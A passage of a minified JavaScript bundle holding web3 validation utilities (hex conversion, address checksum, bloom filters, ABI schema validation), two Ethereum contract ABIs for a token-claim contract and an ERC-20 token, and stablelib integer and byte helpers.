                            const e = (0, t.abiSchemaToJsonSchema)(u, a);
                            e.$id = a, p.items.push(e);
                        }
                    }
                    return n;
                }, t.ethAbiToJsonSchema = (e)=>(0, t.abiSchemaToJsonSchema)(e), t.fetchArrayElement = (e, r)=>1 === r ? e : (0, t.fetchArrayElement)(e[0], r - 1), t.transformJsonDataToAbiFormat = (e, r, n)=>{
                    const i = [];
                    for (const [s, a] of e.entries()){
                        let e, u, c = [];
                        (0, o.isAbiParameterSchema)(a) ? (e = a.type, u = a.name, c = a.components) : "string" == typeof a ? e = a : Array.isArray(a) && (a[1] && Array.isArray(a[1]) ? (e = a[0], c = a[1]) : (e = "tuple", c = a));
                        const { baseType: l, isArray: d, arraySizes: h } = (0, t.parseBaseType)(e), f = Array.isArray(r) ? r[s] : r[u];
                        if ("tuple" !== l || d) {
                            if ("tuple" === l && d) {
                                const e = [];
                                for (const r of f)if (h.length > 1) {
                                    const i = (0, t.fetchArrayElement)(r, h.length - 1), o = [];
                                    for (const e of i)o.push((0, t.transformJsonDataToAbiFormat)(c, e, n));
                                    e.push(o);
                                } else e.push((0, t.transformJsonDataToAbiFormat)(c, r, n));
                                i.push(e);
                            } else i.push(f);
                        } else i.push((0, t.transformJsonDataToAbiFormat)(c, f, n));
                    }
                    return (n = null != n ? n : []).push(...i), n;
                }, t.codePointToInt = (e)=>{
                    if (e >= 48 && e <= 57) return e - 48;
                    if (e >= 65 && e <= 70) return e - 55;
                    if (e >= 97 && e <= 102) return e - 87;
                    throw new Error(`Invalid code point: ${e}`);
                }, t.hexToNumber = (e)=>{
                    if (!(0, s.isHexStrict)(e)) throw new Error("Invalid hex string");
                    const [t, r] = e.startsWith("-") ? [
                        !0,
                        e.slice(1)
                    ] : [
                        !1,
                        e
                    ], n = BigInt(r);
                    return n > Number.MAX_SAFE_INTEGER ? t ? -n : n : n < Number.MIN_SAFE_INTEGER ? n : t ? -1 * Number(n) : Number(n);
                }, t.numberToHex = (e)=>{
                    if (("number" == typeof e || "bigint" == typeof e) && e < 0) return `-0x${e.toString(16).slice(1)}`;
                    if (("number" == typeof e || "bigint" == typeof e) && e >= 0) return `0x${e.toString(16)}`;
                    if ("string" == typeof e && (0, s.isHexStrict)(e)) {
                        const [t, r] = e.startsWith("-") ? [
                            !0,
                            e.slice(1)
                        ] : [
                            !1,
                            e
                        ];
                        return `${t ? "-" : ""}0x${r.split(/^(-)?0(x|X)/).slice(-1)[0].replace(/^0+/, "").toLowerCase()}`;
                    }
                    if ("string" == typeof e && !(0, s.isHexStrict)(e)) return (0, t.numberToHex)(BigInt(e));
                    throw new n.InvalidNumberError(e);
                }, t.padLeft = (e, r, n = "0")=>{
                    if ("string" == typeof e && !(0, s.isHexStrict)(e)) return e.padStart(r, n);
                    const i = "string" == typeof e && (0, s.isHexStrict)(e) ? e : (0, t.numberToHex)(e), [o, a] = i.startsWith("-") ? [
                        "-0x",
                        i.slice(3)
                    ] : [
                        "0x",
                        i.slice(2)
                    ];
                    return `${o}${a.padStart(r, n)}`;
                }, t.uint8ArrayToHexString = function(e) {
                    let t = "0x";
                    for (const r of e){
                        const e = r.toString(16);
                        t += 1 === e.length ? `0${e}` : e;
                    }
                    return t;
                }, t.hexToUint8Array = function(e) {
                    let t;
                    if (t = e.toLowerCase().startsWith("0x") ? e.slice(2) : e, t.length % 2 != 0) throw new n.InvalidBytesError(`hex string has odd length: ${e}`);
                    const r = new Uint8Array(Math.ceil(t.length / 2));
                    for(let e = 0; e < r.length; e += 1){
                        const n = parseInt(t.substring(2 * e, 2 * e + 2), 16);
                        r[e] = n;
                    }
                    return r;
                };
            },
            1283: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isAbiParameterSchema = void 0, t.isAbiParameterSchema = (e)=>"object" == typeof e && "type" in e && "name" in e;
            },
            2681: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isAddress = t.checkAddressCheckSum = void 0;
                const n = r(4488), i = r(7737), o = r(8171), s = r(7420);
                t.checkAddressCheckSum = (e)=>{
                    if (!/^(0x)?[0-9a-f]{40}$/i.test(e)) return !1;
                    const t = e.slice(2), r = (0, i.utf8ToBytes)(t.toLowerCase()), s = (0, o.uint8ArrayToHexString)((0, n.keccak256)(r)).slice(2);
                    for(let e = 0; e < 40; e += 1)if (parseInt(s[e], 16) > 7 && t[e].toUpperCase() !== t[e] || parseInt(s[e], 16) <= 7 && t[e].toLowerCase() !== t[e]) return !1;
                    return !0;
                }, t.isAddress = (e, r = !0)=>{
                    if ("string" != typeof e && !(e instanceof Uint8Array)) return !1;
                    let n;
                    return n = e instanceof Uint8Array ? (0, o.uint8ArrayToHexString)(e) : "string" != typeof e || (0, s.isHexStrict)(e) || e.toLowerCase().startsWith("0x") ? e : `0x${e}`, !!/^(0x)?[0-9a-f]{40}$/i.test(n) && (!(!/^(0x|0X)?[0-9a-f]{40}$/.test(n) && !/^(0x|0X)?[0-9A-F]{40}$/.test(n)) || !r || (0, t.checkAddressCheckSum)(n));
                };
            },
            6660: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isBlockNumberOrTag = t.isBlockTag = t.isBlockNumber = void 0;
                const n = r(9970), i = r(6378);
                t.isBlockNumber = (e)=>(0, i.isUInt)(e), t.isBlockTag = (e)=>Object.values(n.BlockTags).includes(e), t.isBlockNumberOrTag = (e)=>(0, t.isBlockTag)(e) || (0, t.isBlockNumber)(e);
            },
            5191: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isContractAddressInBloom = t.isUserEthereumAddressInBloom = t.isInBloom = t.isBloom = void 0;
                const n = r(4488), i = r(8171), o = r(2681), s = r(7420);
                t.isBloom = (e)=>!("string" != typeof e || !/^(0x)?[0-9a-f]{512}$/i.test(e) || !/^(0x)?[0-9a-f]{512}$/.test(e) && !/^(0x)?[0-9A-F]{512}$/.test(e)), t.isInBloom = (e, r)=>{
                    if ("string" == typeof r && !(0, s.isHexStrict)(r)) return !1;
                    if (!(0, t.isBloom)(e)) return !1;
                    const o = "string" == typeof r ? (0, i.hexToUint8Array)(r) : r, a = (0, i.uint8ArrayToHexString)((0, n.keccak256)(o)).slice(2);
                    for(let t = 0; t < 12; t += 4){
                        const r = (parseInt(a.slice(t, t + 2), 16) << 8) + parseInt(a.slice(t + 2, t + 4), 16) & 2047, n = 1 << r % 4;
                        if (((0, i.codePointToInt)(e.charCodeAt(e.length - 1 - Math.floor(r / 4))) & n) !== n) return !1;
                    }
                    return !0;
                }, t.isUserEthereumAddressInBloom = (e, r)=>{
                    if (!(0, t.isBloom)(e)) return !1;
                    if (!(0, o.isAddress)(r)) return !1;
                    const n = (0, i.padLeft)(r, 64);
                    return (0, t.isInBloom)(e, n);
                }, t.isContractAddressInBloom = (e, r)=>!!(0, t.isBloom)(e) && !!(0, o.isAddress)(r) && (0, t.isInBloom)(e, r);
            },
            4416: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isBoolean = void 0;
                const n = r(7420);
                t.isBoolean = (e)=>!(![
                        "number",
                        "string",
                        "boolean"
                    ].includes(typeof e) || "boolean" != typeof e && ("string" != typeof e || (0, n.isHexStrict)(e) ? "string" == typeof e && (0, n.isHexStrict)(e) ? "0x1" !== e && "0x0" !== e : "number" != typeof e || 1 !== e && 0 !== e : "1" !== e && "0" !== e));
            },
            3921: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isBytes = t.isUint8Array = void 0;
                const n = r(8171), i = r(7420);
                t.isUint8Array = (e)=>e instanceof Uint8Array, t.isBytes = (e, t = {
                    abiType: "bytes"
                })=>{
                    if (!("string" == typeof e || Array.isArray(e) || e instanceof Uint8Array)) return !1;
                    if ("string" == typeof e && (0, i.isHexStrict)(e) && e.startsWith("-")) return !1;
                    if ("string" == typeof e && !(0, i.isHexStrict)(e)) return !1;
                    let r;
                    if ("string" == typeof e) {
                        if (e.length % 2 != 0) return !1;
                        r = (0, n.hexToUint8Array)(e);
                    } else if (Array.isArray(e)) {
                        if (e.some((e)=>e < 0 || e > 255 || !Number.isInteger(e))) return !1;
                        r = new Uint8Array(e);
                    } else r = e;
                    if (null == t ? void 0 : t.abiType) {
                        const { baseTypeSize: e } = (0, n.parseBaseType)(t.abiType);
                        return !e || r.length === e;
                    }
                    return !(null == t ? void 0 : t.size) || r.length === (null == t ? void 0 : t.size);
                };
            },
            1478: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isValidEthBaseType = void 0;
                const n = r(8171);
                t.isValidEthBaseType = (e)=>{
                    const { baseType: t, baseTypeSize: r } = (0, n.parseBaseType)(e);
                    return !!t && (t === e || ("int" !== t && "uint" !== t || !r || r <= 256 && r % 8 == 0) && ("bytes" !== t || !r || r >= 1 && r <= 32));
                };
            },
            5164: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isFilterObject = void 0;
                const n = r(2681), i = r(6660), o = r(2102), s = r(5702);
                t.isFilterObject = (e)=>{
                    const t = [
                        "fromBlock",
                        "toBlock",
                        "address",
                        "topics",
                        "blockHash"
                    ];
                    if ((0, o.isNullish)(e) || "object" != typeof e) return !1;
                    if (!Object.keys(e).every((e)=>t.includes(e))) return !1;
                    if (!(0, o.isNullish)(e.fromBlock) && !(0, i.isBlockNumberOrTag)(e.fromBlock) || !(0, o.isNullish)(e.toBlock) && !(0, i.isBlockNumberOrTag)(e.toBlock)) return !1;
                    if (!(0, o.isNullish)(e.address)) {
                        if (Array.isArray(e.address)) {
                            if (!e.address.every((e)=>(0, n.isAddress)(e))) return !1;
                        } else if (!(0, n.isAddress)(e.address)) return !1;
                    }
                    return !(!(0, o.isNullish)(e.topics) && !e.topics.every((e)=>!!(0, o.isNullish)(e) || (Array.isArray(e) ? e.every((e)=>(0, s.isTopic)(e)) : !!(0, s.isTopic)(e))));
                };
            },
            1851: function(e, t, r) {
                "use strict";
                var n = this && this.__createBinding || (Object.create ? function(e, t, r, n) {
                    void 0 === n && (n = r);
                    var i = Object.getOwnPropertyDescriptor(t, r);
                    i && !("get" in i ? !t.__esModule : i.writable || i.configurable) || (i = {
                        enumerable: !0,
                        get: function() {
                            return t[r];
                        }
                    }), Object.defineProperty(e, n, i);
                } : function(e, t, r, n) {
                    void 0 === n && (n = r), e[n] = t[r];
                }), i = this && this.__exportStar || function(e, t) {
                    for(var r in e)"default" === r || Object.prototype.hasOwnProperty.call(t, r) || n(t, e, r);
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), i(r(2681), t), i(r(6660), t), i(r(5191), t), i(r(4416), t), i(r(3921), t), i(r(1478), t), i(r(5164), t), i(r(6378), t), i(r(7420), t), i(r(5702), t), i(r(2102), t);
            },
            6378: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isNumber = t.isInt = t.isUInt = t.isBigInt = void 0;
                const n = r(8171), i = r(7420);
                t.isBigInt = (e)=>"bigint" == typeof e, t.isUInt = (e, t = {
                    abiType: "uint"
                })=>{
                    if (![
                        "number",
                        "string",
                        "bigint"
                    ].includes(typeof e) || "string" == typeof e && 0 === e.length) return !1;
                    let r;
                    if (null == t ? void 0 : t.abiType) {
                        const { baseTypeSize: e } = (0, n.parseBaseType)(t.abiType);
                        e && (r = e);
                    } else t.bitSize && (r = t.bitSize);
                    const o = BigInt(2) ** BigInt(null != r ? r : 256) - BigInt(1);
                    try {
                        const t = "string" == typeof e && (0, i.isHexStrict)(e) ? BigInt((0, n.hexToNumber)(e)) : BigInt(e);
                        return t >= 0 && t <= o;
                    } catch (e) {
                        return !1;
                    }
                }, t.isInt = (e, t = {
                    abiType: "int"
                })=>{
                    if (![
                        "number",
                        "string",
                        "bigint"
                    ].includes(typeof e)) return !1;
                    if ("number" == typeof e && e > Number.MAX_SAFE_INTEGER) return !1;
                    let r;
                    if (null == t ? void 0 : t.abiType) {
                        const { baseTypeSize: e, baseType: i } = (0, n.parseBaseType)(t.abiType);
                        if ("int" !== i) return !1;
                        e && (r = e);
                    } else t.bitSize && (r = t.bitSize);
                    const o = BigInt(2) ** BigInt((null != r ? r : 256) - 1), s = BigInt(-1) * BigInt(2) ** BigInt((null != r ? r : 256) - 1);
                    try {
                        const t = "string" == typeof e && (0, i.isHexStrict)(e) ? BigInt((0, n.hexToNumber)(e)) : BigInt(e);
                        return t >= s && t <= o;
                    } catch (e) {
                        return !1;
                    }
                }, t.isNumber = (e)=>!!(0, t.isInt)(e) || !("string" != typeof e || !/[0-9.]/.test(e) || e.indexOf(".") !== e.lastIndexOf(".")) || "number" == typeof e;
            },
            2102: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isObject = t.isNullish = void 0;
                const n = r(9970);
                t.isNullish = (e)=>null == e, t.isObject = (e)=>!("object" != typeof e || (0, t.isNullish)(e) || Array.isArray(e) || e instanceof n.TypedArray);
            },
            7420: (e, t)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.validateNoLeadingZeroes = t.isHexPrefixed = t.isHexString32Bytes = t.isHexString8Bytes = t.isHex = t.isHexString = t.isHexStrict = t.isString = void 0, t.isString = (e)=>"string" == typeof e, t.isHexStrict = (e)=>"string" == typeof e && /^((-)?0x[0-9a-f]+|(0x))$/i.test(e), t.isHexString = function(e, t) {
                    return !("string" != typeof e || !e.match(/^0x[0-9A-Fa-f]*$/) || void 0 !== t && t > 0 && e.length !== 2 + 2 * t);
                }, t.isHex = (e)=>"number" == typeof e || "bigint" == typeof e || "string" == typeof e && /^((-0x|0x|-)?[0-9a-f]+|(0x))$/i.test(e), t.isHexString8Bytes = (e, r = !0)=>r ? (0, t.isHexStrict)(e) && 18 === e.length : (0, t.isHex)(e) && 16 === e.length, t.isHexString32Bytes = (e, r = !0)=>r ? (0, t.isHexStrict)(e) && 66 === e.length : (0, t.isHex)(e) && 64 === e.length, t.isHexPrefixed = function(e) {
                    if ("string" != typeof e) throw new Error("[isHexPrefixed] input must be type 'string', received type " + typeof e);
                    return e.startsWith("0x");
                }, t.validateNoLeadingZeroes = function(e) {
                    for (const [t, r] of Object.entries(e))if (void 0 !== r && r.length > 0 && 0 === r[0]) throw new Error(`${t} cannot have leading zeroes, received: ${r.toString()}`);
                };
            },
            5702: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.isTopicInBloom = t.isTopic = void 0;
                const n = r(5191);
                t.isTopic = (e)=>!("string" != typeof e || !/^(0x)?[0-9a-f]{64}$/i.test(e) || !/^(0x)?[0-9a-f]{64}$/.test(e) && !/^(0x)?[0-9A-F]{64}$/.test(e)), t.isTopicInBloom = (e, r)=>!!(0, n.isBloom)(e) && !!(0, t.isTopic)(r) && (0, n.isInBloom)(e, r);
            },
            1714: function(e, t, r) {
                "use strict";
                var n = this && this.__importDefault || function(e) {
                    return e && e.__esModule ? e : {
                        default: e
                    };
                };
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Validator = void 0;
                const i = r(7737), o = r(7640), s = n(r(772)), a = n(r(2677)), u = r(356);
                class c {
                    constructor(){
                        this._schemas = new Map;
                    }
                    static factory() {
                        return c.validatorInstance || (c.validatorInstance = new c), c.validatorInstance;
                    }
                    getSchema(e) {
                        return this._schemas.get(e);
                    }
                    addSchema(e, t) {
                        this._schemas.set(e, this.createValidator(t));
                    }
                    createValidator(e) {
                        return (0, s.default)(e, {
                            formats: a.default,
                            greedy: !0,
                            verbose: !0,
                            additionalProperties: !1
                        });
                    }
                    validate(e, t, r) {
                        const n = this.getOrCreateValidator(e);
                        if (!n(t)) {
                            const i = this.convertErrors(n.errors, e, t);
                            if (i) {
                                if (null == r ? void 0 : r.silent) return i;
                                throw new u.Web3ValidatorError(i);
                            }
                        }
                    }
                    convertErrors(e, t, r) {
                        if (e && Array.isArray(e) && e.length > 0) return e.map((e)=>{
                            let n, i, o, s;
                            s = Array.isArray(e.schemaPath) ? e.schemaPath.slice(1).join("/") : "";
                            const { field: a } = e, u = s || ((null == a ? void 0 : a.length) >= 4 ? `${a.slice(4).replace(/\"|\[|\]/g, "")}` : "/"), c = u ? `/${u}` : "";
                            if ("has less items than allowed" === (null == e ? void 0 : e.message)) {
                                const e = this.getObjectValueByPath(t, s);
                                e.minItems && (i = "minItems", s = `${s}/minItems`, o = {
                                    limit: e.minItems
                                }, n = `must NOT have fewer than ${e.minItems} items`);
                            } else if ("has more items than allowed" === (null == e ? void 0 : e.message)) {
                                const e = this.getObjectValueByPath(t, s);
                                e.maxItems && (i = "maxItems", s = `${s}/maxItems`, o = {
                                    limit: e.maxItems
                                }, n = `must NOT have more than ${e.maxItems} items`);
                            } else if ((null == e ? void 0 : e.message.startsWith("must be")) && (null == e ? void 0 : e.message.endsWith("format"))) {
                                const t = null == e ? void 0 : e.message.split(" ")[2];
                                t && (n = `must pass "${t}" validation`);
                            }
                            const l = this.getObjectValueByPath(r, c);
                            return {
                                keyword: null != i ? i : e.field,
                                instancePath: c,
                                schemaPath: `#${s}`,
                                params: null != o ? o : {
                                    value: l
                                },
                                message: null != n ? n : e.message
                            };
                        });
                    }
                    getOrCreateValidator(e) {
                        const t = c.getKey(e);
                        let r = this.getSchema(t);
                        return r || (this.addSchema(t, e), r = this.getSchema(t)), r;
                    }
                    static getKey(e) {
                        return (0, i.toHex)((0, o.blake2b)((0, i.utf8ToBytes)(JSON.stringify(e))));
                    }
                    getObjectValueByPath(e, t, r) {
                        try {
                            if ("object" != typeof e) throw new Error("Invalid input object");
                            if ("string" != typeof t) throw new Error("Invalid JSON pointer");
                            const n = t.split("/");
                            if (![
                                "",
                                "#"
                            ].includes(n.shift())) throw new Error("Invalid JSON pointer");
                            if (0 === n.length) return e;
                            let i = e;
                            for (const e of n){
                                if ("string" != typeof e) throw new Error("Invalid JSON pointer");
                                r && r.push(i);
                                const t = this.untilde(e);
                                if ("object" != typeof i) return;
                                if (!Object.prototype.hasOwnProperty.call(i, t)) return;
                                i = i[t];
                            }
                            return i;
                        } catch (e) {
                            return "";
                        }
                    }
                    untilde(e) {
                        return e.includes("~") ? e.replace(/~[01]/g, (e)=>{
                            switch(e){
                                case "~1":
                                    return "/";
                                case "~0":
                                    return "~";
                                default:
                                    throw new Error("Unreachable");
                            }
                        }) : e;
                    }
                }
                t.Validator = c;
            },
            7985: (e, t, r)=>{
                "use strict";
                Object.defineProperty(t, "__esModule", {
                    value: !0
                }), t.Web3Validator = void 0;
                const n = r(1714), i = r(8171), o = r(356);
                t.Web3Validator = class {
                    constructor(){
                        this._validator = n.Validator.factory();
                    }
                    validateJSONSchema(e, t, r) {
                        return this._validator.validate(e, t, r);
                    }
                    validate(e, t, r = {
                        silent: !1
                    }) {
                        var n, s;
                        const a = (0, i.ethAbiToJsonSchema)(e);
                        if (!Array.isArray(a.items) || 0 !== (null === (n = a.items) || void 0 === n ? void 0 : n.length) || 0 !== t.length) {
                            if (Array.isArray(a.items) && 0 === (null === (s = a.items) || void 0 === s ? void 0 : s.length) && 0 !== t.length) throw new o.Web3ValidatorError([
                                {
                                    instancePath: "/0",
                                    schemaPath: "/",
                                    keyword: "required",
                                    message: "empty schema against data can not be validated",
                                    params: t
                                }
                            ]);
                            return this._validator.validate(a, t, r);
                        }
                    }
                };
            }
        }, t = {};
        function r(n) {
            var i = t[n];
            if (void 0 !== i) return i.exports;
            var o = t[n] = {
                id: n,
                loaded: !1,
                exports: {}
            };
            return e[n].call(o.exports, o, o.exports, r), o.loaded = !0, o.exports;
        }
        r.amdO = {}, r.n = (e)=>{
            var t = e && e.__esModule ? ()=>e.default : ()=>e;
            return r.d(t, {
                a: t
            }), t;
        }, r.d = (e, t)=>{
            for(var n in t)r.o(t, n) && !r.o(e, n) && Object.defineProperty(e, n, {
                enumerable: !0,
                get: t[n]
            });
        }, r.g = function() {
            if ("object" == typeof globalThis) return globalThis;
            try {
                return this || new Function("return this")();
            } catch (e) {
                if ("object" == typeof window) return window;
            }
        }(), r.o = (e, t)=>Object.prototype.hasOwnProperty.call(e, t), r.r = (e)=>{
            "undefined" != typeof Symbol && Symbol.toStringTag && Object.defineProperty(e, Symbol.toStringTag, {
                value: "Module"
            }), Object.defineProperty(e, "__esModule", {
                value: !0
            });
        }, r.nmd = (e)=>(e.paths = [], e.children || (e.children = []), e);
        var n = r(9375);
        return n.default;
    })());


var $4d2414ec018917f2$exports = {};
$4d2414ec018917f2$exports = JSON.parse('[{"inputs":[{"internalType":"address","name":"tokenAddress","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"changeOwner","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"claim","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"getContractBalance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"withdrawTokens","outputs":[],"stateMutability":"nonpayable","type":"function"}]');


var $9975c64ce2e299cc$exports = {};
$9975c64ce2e299cc$exports = JSON.parse('[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"mint","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]');



var $7etJZ = parcelRequire("7etJZ");
var $1ca962bc0b1868f1$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($1ca962bc0b1868f1$exports, "__esModule", {
    value: true
});
var $3ca0635e21db662f$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($3ca0635e21db662f$exports, "__esModule", {
    value: true
});
var $ddd89ca0ca71c6d3$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($ddd89ca0ca71c6d3$exports, "__esModule", {
    value: true
});
var $51a3ca76628cc201$exports = {};
"use strict";
// Copyright (C) 2016 Dmitry Chestnykh
// MIT License. See LICENSE file for details.
Object.defineProperty($51a3ca76628cc201$exports, "__esModule", {
    value: true
});
/**
 * Package int provides helper functions for integerss.
 */ // Shim using 16-bit pieces.
function $51a3ca76628cc201$var$imulShim(a, b) {
    var ah = a >>> 16 & 0xffff, al = a & 0xffff;
    var bh = b >>> 16 & 0xffff, bl = b & 0xffff;
    return al * bl + (ah * bl + al * bh << 16 >>> 0) | 0;
}
/** 32-bit integer multiplication.  */ // Use system Math.imul if available, otherwise use our shim.
$51a3ca76628cc201$exports.mul = Math.imul || $51a3ca76628cc201$var$imulShim;
/** 32-bit integer addition.  */ function $51a3ca76628cc201$var$add(a, b) {
    return a + b | 0;
}
$51a3ca76628cc201$exports.add = $51a3ca76628cc201$var$add;
/**  32-bit integer subtraction.  */ function $51a3ca76628cc201$var$sub(a, b) {
    return a - b | 0;
}
$51a3ca76628cc201$exports.sub = $51a3ca76628cc201$var$sub;
/** 32-bit integer left rotation */ function $51a3ca76628cc201$var$rotl(x, n) {
    return x << n | x >>> 32 - n;
}
$51a3ca76628cc201$exports.rotl = $51a3ca76628cc201$var$rotl;
/** 32-bit integer left rotation */ function $51a3ca76628cc201$var$rotr(x, n) {
    return x << 32 - n | x >>> n;
}
$51a3ca76628cc201$exports.rotr = $51a3ca76628cc201$var$rotr;
function $51a3ca76628cc201$var$isIntegerShim(n) {
    return typeof n === "number" && isFinite(n) && Math.floor(n) === n;
}
/**
 * Returns true if the argument is an integer number.
 *
 * In ES2015, Number.isInteger.
 */ $51a3ca76628cc201$exports.isInteger = Number.isInteger || $51a3ca76628cc201$var$isIntegerShim;
/**
 *  Math.pow(2, 53) - 1
 *
 *  In ES2015 Number.MAX_SAFE_INTEGER.
 */ $51a3ca76628cc201$exports.MAX_SAFE_INTEGER = 9007199254740991;
/**
 * Returns true if the argument is a safe integer number
 * (-MIN_SAFE_INTEGER < number <= MAX_SAFE_INTEGER)
 *
 * In ES2015, Number.isSafeInteger.
 */ $51a3ca76628cc201$exports.isSafeInteger = function(n) {
    return $51a3ca76628cc201$exports.isInteger(n) && n >= -$51a3ca76628cc201$exports.MAX_SAFE_INTEGER && n <= $51a3ca76628cc201$exports.MAX_SAFE_INTEGER;
};


// TODO(dchest): add asserts for correct value ranges and array offsets.
/**
 * Reads 2 bytes from array starting at offset as big-endian
 * signed 16-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readInt16BE(array, offset) {
    if (offset === void 0) offset = 0;
    return (array[offset + 0] << 8 | array[offset + 1]) << 16 >> 16;
}
$ddd89ca0ca71c6d3$exports.readInt16BE = $ddd89ca0ca71c6d3$var$readInt16BE;
/**
 * Reads 2 bytes from array starting at offset as big-endian
 * unsigned 16-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readUint16BE(array, offset) {
    if (offset === void 0) offset = 0;
    return (array[offset + 0] << 8 | array[offset + 1]) >>> 0;
}
$ddd89ca0ca71c6d3$exports.readUint16BE = $ddd89ca0ca71c6d3$var$readUint16BE;
/**
 * Reads 2 bytes from array starting at offset as little-endian
 * signed 16-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readInt16LE(array, offset) {
    if (offset === void 0) offset = 0;
    return (array[offset + 1] << 8 | array[offset]) << 16 >> 16;
}
$ddd89ca0ca71c6d3$exports.readInt16LE = $ddd89ca0ca71c6d3$var$readInt16LE;
/**
 * Reads 2 bytes from array starting at offset as little-endian
 * unsigned 16-bit integer and returns it.
 */ function $ddd89ca0ca71c6d3$var$readUint16LE(array, offset) {
    if (offset === void 0) offset = 0;
    return (array[offset + 1] << 8 | array[offset]) >>> 0;
}
$ddd89ca0ca71c6d3$exports.readUint16LE = $ddd89ca0ca71c6d3$var$readUint16LE;
/**
 * Writes 2-byte big-endian representation of 16-bit unsigned
 * value to byte array starting at offset.
 *
 * If byte array is not given, creates a new 2-byte one.
 *
 * Returns the output byte array.
 */ function $ddd89ca0ca71c6d3$var$writeUint16BE(value, out, offset) {
    if (out === void 0) out = new Uint8Array(2);
    if (offset === void 0) offset = 0;
    out[offset + 0] = value >>> 8;
    out[offset + 1] = value >>> 0;
    return out;
}
$ddd89ca0ca71c6d3$exports.writeUint16BE = $ddd89ca0ca71c6d3$var$writeUint16BE;
